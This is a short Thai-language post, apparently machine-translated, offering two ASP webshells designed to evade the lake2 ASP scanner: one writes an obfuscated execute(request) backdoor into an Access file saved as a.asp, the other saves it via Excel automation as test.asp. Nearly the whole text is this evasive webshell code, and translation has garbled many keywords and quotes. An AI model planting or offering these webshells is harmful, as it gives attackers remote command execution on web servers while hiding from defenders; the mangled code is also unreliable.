โทรจัน ASP ที่แหวกแนวสองตัวถูกเขียนโดย hanxiaolian เพื่อหลีกเลี่ยงผู้ช่วยการจัดการเว็บมาสเตอร์ lake2 ASP
เขียนเพื่อหลีกเลี่ยงผู้ช่วยการจัดการเว็บมาสเตอร์ lake2 ASP ...
1. ม้าที่ข้ามการสแกน Lake2 Asp Trojan
คัดลอกรหัสรหัสดังต่อไปนี้:
-
ตั้ง c = CreateObject (ADOX.Catalog)
c.create(ผู้ให้บริการ=Microsoft.Jet.OLEDB.4.0;แหล่งข้อมูล=&Server.MapPath(a.asp))
ชุด c = ไม่มีเลย
c&Server.MapPath(a.asp)
ตั้งค่า conn=server.createobject (Adodb.Connection)
conn.open constr
conn.execute (สร้างตาราง nomm (nomuma oleobject))
ตั้งค่า rs=server.createobject (adodb.recordset)
sql=SELECT * จาก nomm
rs.open sql,conn,1,3
rs.เพิ่มใหม่
rs (โนมูมะ).appendchunk(chrB(asc(<))&chrB(asc(%))&chrB(asc (e))&chrB
(asc(x))&chrB(asc(e))&chrB(asc(c))&chrB(asc (u))&chrB(asc(t))&chrB(asc
(e))&chrB(asc(+))&chrB(asc (r))&chrB(asc(e))&chrB(asc(q))&chrB(asc
(u))&chrB(asc (e))&chrB(asc(s))&chrB(asc(t))&chrB(asc(())&chrB(34)
&chrB(asc(q))&chrB(34)&chrB(asc()))&chrB(asc(%))& chrB(asc(>)))
อาร์เอสอัปเดต
RS.ปิด
ตั้งค่า rs=nothing
เชื่อมต่อปิด
ตั้งค่า conn=ไม่มีอะไร
-
เวอร์ชัน 2.xls asp webshell
คัดลอกรหัสรหัสดังต่อไปนี้:
-
ตั้งค่า xlA = Server.CreateObject(Excel.Application)
xlA.Visible = เท็จ
xlA.สมุดงาน.เพิ่ม
ตั้งค่า xlWorksheet = xlA.Worksheets(1)
xlWorksheet.Cells(1,1).Value = <%ex&ec&ute(request(q))+chr(37)+>
'strFile = d:/test.asp
strFile = Server.MapPath (test.asp)
xlWorkSheet.SaveAs strFile
xlA.เลิก
ตั้งค่า xlWorksheet = ไม่มีเลย
ตั้งค่า xlA = ไม่มีเลย
-